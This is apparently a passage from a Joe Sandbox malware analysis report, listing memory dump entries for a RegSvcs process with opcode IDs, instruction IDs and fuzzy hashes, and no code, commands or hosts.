                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8859ed8481e36411d15d6b3395e2d3b39d7a2eaa6f0bc7094aafd227e9f2f7f6
                                                                    • Instruction ID: a9e9103cb492d2dd9029e089aaf6b736142a351763af20e53f18c815c2594392
                                                                    • Opcode Fuzzy Hash: 8859ed8481e36411d15d6b3395e2d3b39d7a2eaa6f0bc7094aafd227e9f2f7f6
                                                                    • Instruction Fuzzy Hash: 36E08C3A10D2828FC302CF68E940C46FFB19B9B210B18498EE0D0932A3C6219C07CB72
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a77363554e58138c439e7bcddea4fcd5f0041e23d64d632bf7258fac822dde0
                                                                    • Instruction ID: f3c875bb4435c5de181717a554ed42c72fd17defcc8c17adc4bc994f0bfeb3d5
                                                                    • Opcode Fuzzy Hash: 5a77363554e58138c439e7bcddea4fcd5f0041e23d64d632bf7258fac822dde0
                                                                    • Instruction Fuzzy Hash: DDD01730A11249EFCB41EFA4E90565EB7F9FB48204B6081A9D808D7304EB316E049B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc7bdc67fb80b839ab8fbb2b94e6798e7a0e9d1deb0368fc64bffcb3cb76a53c
                                                                    • Instruction ID: 6606f9aae768d393317b179108c698045349a7970ec1b753a543d4962d4ac569
                                                                    • Opcode Fuzzy Hash: cc7bdc67fb80b839ab8fbb2b94e6798e7a0e9d1deb0368fc64bffcb3cb76a53c
                                                                    • Instruction Fuzzy Hash: 20D05EB25092019FC681CE40FD42D86BBA2DFD5604F09884AA540A3351EA22CC16DB73
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e5bb7b09d9a36fb8524cd6f77f1c130163bebc51dc8b45995d348a51e2694c3
                                                                    • Instruction ID: e19a2ad7eafe93c6ec49582870772d8a52e954befba9f1db82fbc57d09f78b9c
                                                                    • Opcode Fuzzy Hash: 4e5bb7b09d9a36fb8524cd6f77f1c130163bebc51dc8b45995d348a51e2694c3
                                                                    • Instruction Fuzzy Hash: DED0127110C141DFC701CF64E550D56FFE29F99604F19888EE48457313C622DC26D722
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ca9062da17eb9aa8d1ddd9337ff91b07167167898bb4e7f2f6882c36e8e7455
                                                                    • Instruction ID: d291b7a0ac8bf5d6775398920f7b3fe1724d1ce8d5114c7db690371a64c87a5e
                                                                    • Opcode Fuzzy Hash: 5ca9062da17eb9aa8d1ddd9337ff91b07167167898bb4e7f2f6882c36e8e7455
                                                                    • Instruction Fuzzy Hash: DBD0C971D0520CEB8B00EFE9994099EB7FADB86104B1042EA9908D7211E9315F10DB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 480137ef1cb4d4016e129ee8412976a36142b94822f9268475bbf83df9eb49e7
                                                                    • Instruction ID: d3e63857088077f34ac372a32947b5b0c1ebae77d0fa10cba900a8a084adfca9
                                                                    • Opcode Fuzzy Hash: 480137ef1cb4d4016e129ee8412976a36142b94822f9268475bbf83df9eb49e7
                                                                    • Instruction Fuzzy Hash: BAD05E7910C3814FC342CB54E850856BF61AF8A204B09888AE4918B353C761DC17DF21
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 909aa07a6507455c2213df1818227931a377529a3d7f8d604f207d8dff51dbd8
                                                                    • Instruction ID: 1031eb4face7dfc1200c889efea90b4f26600efff6941cd7038c9a4d9c057a09
                                                                    • Opcode Fuzzy Hash: 909aa07a6507455c2213df1818227931a377529a3d7f8d604f207d8dff51dbd8
                                                                    • Instruction Fuzzy Hash: F7D0C7751082908BC641DF55E560E96BBE2EFC5204F198899D49487313C762D827CB65
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c9f05b00258cfc4e3d0c8214937ce65fb7b23b5c00b89a1e3707a346d946a4c
                                                                    • Instruction ID: 35335bf5d9dcbfe37c88ddd24e929956b4dbb9c9f769fe9b987dea7535abf6cb
                                                                    • Opcode Fuzzy Hash: 8c9f05b00258cfc4e3d0c8214937ce65fb7b23b5c00b89a1e3707a346d946a4c
                                                                    • Instruction Fuzzy Hash: 89D0A9726083808FD304CF40E842E42BBA2FFC4204F28C89EE44187312C732D813CB61
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                    • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                    • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                    • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                    • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                    • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                    • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 293c15aefb547b32e8ea6c229d153d400cc6e626f2774e021e5d089328fbc4ff
                                                                    • Instruction ID: 399def55c0732b8f0c8c188b617bde56c19ac7af40f29103edccf8fa336b43df
                                                                    • Opcode Fuzzy Hash: 293c15aefb547b32e8ea6c229d153d400cc6e626f2774e021e5d089328fbc4ff
                                                                    • Instruction Fuzzy Hash: 34C04C7151F3844FD7030B7448110D43BB1EF5762E3DB44DAD085DB1A3D629550AC715
Memory Dump Source
• Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 680ba514e373c83c4bd0ecd75cbf232e871d7db8a34054a3afde84230277a3c9
• Instruction ID: ff7bfe4b84669566038969674e7166ab7ede3fe35ad43948501b824a0df18e4a
• Opcode Fuzzy Hash: 680ba514e373c83c4bd0ecd75cbf232e871d7db8a34054a3afde84230277a3c9
• Instruction Fuzzy Hash: 25C04CA414E3C04FD306C724DC65451BF309F47505B5C90CAE594CB2A7D61ADC07DB56
Memory Dump Source
• Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 165bb9e052aaa0751085e1e6d3a2142f97f43a5c4f264ebc99181504699ca789
• Instruction ID: 790f5f0b98f001be139d064168b925a8b2f1aa51918739474386730c5eabbe0a
• Opcode Fuzzy Hash: 165bb9e052aaa0751085e1e6d3a2142f97f43a5c4f264ebc99181504699ca789
• Instruction Fuzzy Hash: 2DC0085000F7C14FD71756285A642457FB14A53205B6A14CFD0C0CB193D159584ED722
Memory Dump Source
• Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4d5181075fff84b120cf8f7d2b8936c564e4187e6d2b6e532e7444f90a98f327
• Instruction ID: 6abc56b61679ff42466a44c31a9617bb81594173bf9cb4d0d7ba708294bf932a
• Opcode Fuzzy Hash: 4d5181075fff84b120cf8f7d2b8936c564e4187e6d2b6e532e7444f90a98f327
• Instruction Fuzzy Hash: E7B012312050204B8388CA1CC881408F3A1EBC8314318C49CA408CB345CF33EC03C540
Memory Dump Source
• Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
• Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
• Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
• Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
Memory Dump Source
• Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27d13d7b09abe24bd64d3fff043d16df4008c3c47013df85615142b0afbdb460
• Instruction ID: 510cf5168267272ef2b5b5eae1714afb2a6014c8ed9973fe73a641d7811319c9
• Opcode Fuzzy Hash: 27d13d7b09abe24bd64d3fff043d16df4008c3c47013df85615142b0afbdb460
• Instruction Fuzzy Hash: 15A011302000008B8A00EA00C882800B320EB80228B28C088A8288B30ACB33EA03CA00
Memory Dump Source
• Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
• Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
• Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
• Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40